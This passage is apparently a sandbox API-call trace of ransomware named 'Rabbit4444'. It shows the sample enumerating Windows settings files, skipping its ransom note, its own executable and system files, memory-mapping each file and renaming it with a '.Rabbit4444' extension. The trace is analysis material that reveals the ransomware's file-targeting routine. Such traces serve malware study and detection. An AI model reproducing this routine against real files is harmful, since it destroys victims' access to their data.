(lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.076] lstrlenW (lpString=".dll") returned 4 [0057.076] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.076] lstrlenW (lpString=".lnk") returned 4 [0057.076] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.076] lstrlenW (lpString=".ini") returned 4 [0057.076] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.076] lstrlenW (lpString=".sys") returned 4 [0057.076] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.076] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_Narrator_SpeechVoices.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_accessibility_narrator_speechvoices.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.076] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.076] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14838703621) returned 1 [0057.076] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1325) returned 1 [0057.076] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1178d8 [0057.076] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101ea8 [0057.076] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x830, lpName=0x0) returned 0x298 [0057.079] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x830) returned 0x70000 [0057.080] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.080] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0057.080] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.080] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0057.080] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.081] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0057.081] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.081] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0057.081] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14839151751) returned 1 [0057.081] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1178d8 | out: hHeap=0xe0000) returned 1 [0057.081] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101ea8 | out: hHeap=0xe0000) returned 1 [0057.081] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.081] CloseHandle (hObject=0x298) returned 1 [0057.081] CloseHandle (hObject=0x278) returned 1 [0057.081] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_Narrator_SpeechVoices.settingcontent-ms.Rabbit4444") returned 200 [0057.081] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_Narrator_SpeechVoices.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_accessibility_narrator_speechvoices.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_Narrator_SpeechVoices.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_accessibility_narrator_speechvoices.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.082] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e82941a, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x1e82941a, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23a9aeb1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x529, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Accessibility_NotificationDuration.settingcontent-ms", cAlternateFileName="AA31F0~1.SET")) returned 1 [0057.082] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_NotificationDuration.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.082] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_NotificationDuration.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.082] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_NotificationDuration.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.082] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_NotificationDuration.settingcontent-ms", lpString2=".") returned 1 [0057.082] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_NotificationDuration.settingcontent-ms", lpString2="..") returned 1 [0057.082] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_NotificationDuration.settingcontent-ms", lpString2="windows") returned -1 [0057.082] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_NotificationDuration.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.082] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_NotificationDuration.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.082] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_NotificationDuration.settingcontent-ms", lpString2="boot") returned -1 [0057.082] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_NotificationDuration.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.082] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_NotificationDuration.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.082] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Accessibility_NotificationDuration.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Accessibility_NotificationDuration.settingcontent-ms") returned="AAA_SystemSettings_Accessibility_NotificationDuration.settingcontent-ms" [0057.082] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_NotificationDuration.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.087] lstrlenW (lpString="AAA_SystemSettings_Accessibility_NotificationDuration.settingcontent-ms") returned 71 [0057.087] lstrlenW (lpString="Rabbit4444") returned 10 [0057.087] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.087] lstrlenW (lpString=".dll") returned 4 [0057.087] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.087] lstrlenW (lpString=".lnk") returned 4 [0057.087] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.087] lstrlenW (lpString=".ini") returned 4 [0057.087] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.087] lstrlenW (lpString=".sys") returned 4 [0057.087] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.087] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_NotificationDuration.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_accessibility_notificationduration.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.087] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.087] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14839809392) returned 1 [0057.087] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1321) returned 1 [0057.087] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1179c8 [0057.087] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101fb8 [0057.088] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x830, lpName=0x0) returned 0x298 [0057.089] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x830) returned 0x70000 [0057.089] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.090] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0057.090] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.090] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0057.090] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.090] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0057.090] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.090] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0057.090] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14840071787) returned 1 [0057.090] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1179c8 | out: hHeap=0xe0000) returned 1 [0057.090] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101fb8 | out: hHeap=0xe0000) returned 1 [0057.090] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.090] CloseHandle (hObject=0x298) returned 1 [0057.090] CloseHandle (hObject=0x278) returned 1 [0057.090] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_NotificationDuration.settingcontent-ms.Rabbit4444") returned 199 [0057.090] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_NotificationDuration.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_accessibility_notificationduration.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_NotificationDuration.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_accessibility_notificationduration.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.091] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ee45493, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x1ee45493, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2398fe3f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4c3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Autoplay_IsEnabled.settingcontent-ms", cAlternateFileName="AA5C9A~1.SET")) returned 1 [0057.091] lstrcmpiW (lpString1="AAA_SystemSettings_Autoplay_IsEnabled.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.091] lstrcmpiW (lpString1="AAA_SystemSettings_Autoplay_IsEnabled.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.091] lstrcmpiW (lpString1="AAA_SystemSettings_Autoplay_IsEnabled.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.091] lstrcmpiW (lpString1="AAA_SystemSettings_Autoplay_IsEnabled.settingcontent-ms", lpString2=".") returned 1 [0057.091] lstrcmpiW (lpString1="AAA_SystemSettings_Autoplay_IsEnabled.settingcontent-ms", lpString2="..") returned 1 [0057.091] lstrcmpiW (lpString1="AAA_SystemSettings_Autoplay_IsEnabled.settingcontent-ms", lpString2="windows") returned -1 [0057.092] lstrcmpiW (lpString1="AAA_SystemSettings_Autoplay_IsEnabled.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.092] lstrcmpiW (lpString1="AAA_SystemSettings_Autoplay_IsEnabled.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.092] lstrcmpiW (lpString1="AAA_SystemSettings_Autoplay_IsEnabled.settingcontent-ms", lpString2="boot") returned -1 [0057.092] lstrcmpiW (lpString1="AAA_SystemSettings_Autoplay_IsEnabled.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.092] lstrcmpiW (lpString1="AAA_SystemSettings_Autoplay_IsEnabled.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.092] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Autoplay_IsEnabled.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Autoplay_IsEnabled.settingcontent-ms") returned="AAA_SystemSettings_Autoplay_IsEnabled.settingcontent-ms" [0057.092] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Autoplay_IsEnabled.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.092] lstrlenW (lpString="AAA_SystemSettings_Autoplay_IsEnabled.settingcontent-ms") returned 55 [0057.092] lstrlenW (lpString="Rabbit4444") returned 10 [0057.092] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.092] lstrlenW (lpString=".dll") returned 4 [0057.092] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.092] lstrlenW (lpString=".lnk") returned 4 [0057.092] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.092] lstrlenW (lpString=".ini") returned 4 [0057.092] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.092] lstrlenW (lpString=".sys") returned 4 [0057.092] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.092] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Autoplay_IsEnabled.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_autoplay_isenabled.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.093] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.093] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14840332772) returned 1 [0057.093] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1219) returned 1 [0057.093] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117608 [0057.093] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1020c8 [0057.093] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7d0, lpName=0x0) returned 0x298 [0057.094] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7d0) returned 0x70000 [0057.095] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.095] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0057.095] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.095] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0057.095] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.095] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0057.095] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.095] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0057.095] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14840588924) returned 1 [0057.095] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117608 | out: hHeap=0xe0000) returned 1 [0057.095] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1020c8 | out: hHeap=0xe0000) returned 1 [0057.095] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.095] CloseHandle (hObject=0x298) returned 1 [0057.095] CloseHandle (hObject=0x278) returned 1 [0057.095] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Autoplay_IsEnabled.settingcontent-ms.Rabbit4444") returned 183 [0057.096] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Autoplay_IsEnabled.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_autoplay_isenabled.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Autoplay_IsEnabled.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_autoplay_isenabled.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.096] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f7ceb35, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x1f7ceb35, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2391d733, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x546, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_BatterySaver_LandingPage_OverrideControl.settingcontent-ms", cAlternateFileName="AA9529~1.SET")) returned 1 [0057.096] lstrcmpiW (lpString1="AAA_SystemSettings_BatterySaver_LandingPage_OverrideControl.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.096] lstrcmpiW (lpString1="AAA_SystemSettings_BatterySaver_LandingPage_OverrideControl.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.096] lstrcmpiW (lpString1="AAA_SystemSettings_BatterySaver_LandingPage_OverrideControl.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.096] lstrcmpiW (lpString1="AAA_SystemSettings_BatterySaver_LandingPage_OverrideControl.settingcontent-ms", lpString2=".") returned 1 [0057.097] lstrcmpiW (lpString1="AAA_SystemSettings_BatterySaver_LandingPage_OverrideControl.settingcontent-ms", lpString2="..") returned 1 [0057.097] lstrcmpiW (lpString1="AAA_SystemSettings_BatterySaver_LandingPage_OverrideControl.settingcontent-ms", lpString2="windows") returned -1 [0057.097] lstrcmpiW (lpString1="AAA_SystemSettings_BatterySaver_LandingPage_OverrideControl.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.097] lstrcmpiW (lpString1="AAA_SystemSettings_BatterySaver_LandingPage_OverrideControl.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.097] lstrcmpiW (lpString1="AAA_SystemSettings_BatterySaver_LandingPage_OverrideControl.settingcontent-ms", lpString2="boot") returned -1 [0057.097] lstrcmpiW (lpString1="AAA_SystemSettings_BatterySaver_LandingPage_OverrideControl.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.097] lstrcmpiW (lpString1="AAA_SystemSettings_BatterySaver_LandingPage_OverrideControl.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.097] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_BatterySaver_LandingPage_OverrideControl.settingcontent-ms" | out: lpString1="AAA_SystemSettings_BatterySaver_LandingPage_OverrideControl.settingcontent-ms") returned="AAA_SystemSettings_BatterySaver_LandingPage_OverrideControl.settingcontent-ms" [0057.097] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_BatterySaver_LandingPage_OverrideControl.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.097] lstrlenW (lpString="AAA_SystemSettings_BatterySaver_LandingPage_OverrideControl.settingcontent-ms") returned 77 [0057.097] lstrlenW (lpString="Rabbit4444") returned 10 [0057.097] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.097] lstrlenW (lpString=".dll") returned 4 [0057.097] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.097] lstrlenW (lpString=".lnk") returned 4 [0057.097] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.098] lstrlenW (lpString=".ini") returned 4 [0057.098] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.098] lstrlenW (lpString=".sys") returned 4 [0057.098] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.098] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_BatterySaver_LandingPage_OverrideControl.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_batterysaver_landingpage_overridecontrol.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.098] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.098] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14840869908) returned 1 [0057.098] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1350) returned 1 [0057.098] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0057.098] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101518 [0057.098] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x850, lpName=0x0) returned 0x298 [0057.099] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x850) returned 0x70000 [0057.100] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.100] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0057.100] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.100] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0057.100] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.100] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0057.100] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.100] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0057.100] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14841122227) returned 1 [0057.101] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0057.101] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101518 | out: hHeap=0xe0000) returned 1 [0057.101] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.101] CloseHandle (hObject=0x298) returned 1 [0057.101] CloseHandle (hObject=0x278) returned 1 [0057.101] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_BatterySaver_LandingPage_OverrideControl.settingcontent-ms.Rabbit4444") returned 205 [0057.101] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_BatterySaver_LandingPage_OverrideControl.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_batterysaver_landingpage_overridecontrol.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_BatterySaver_LandingPage_OverrideControl.settingcontent-ms.Rabbit4444" (normalized: 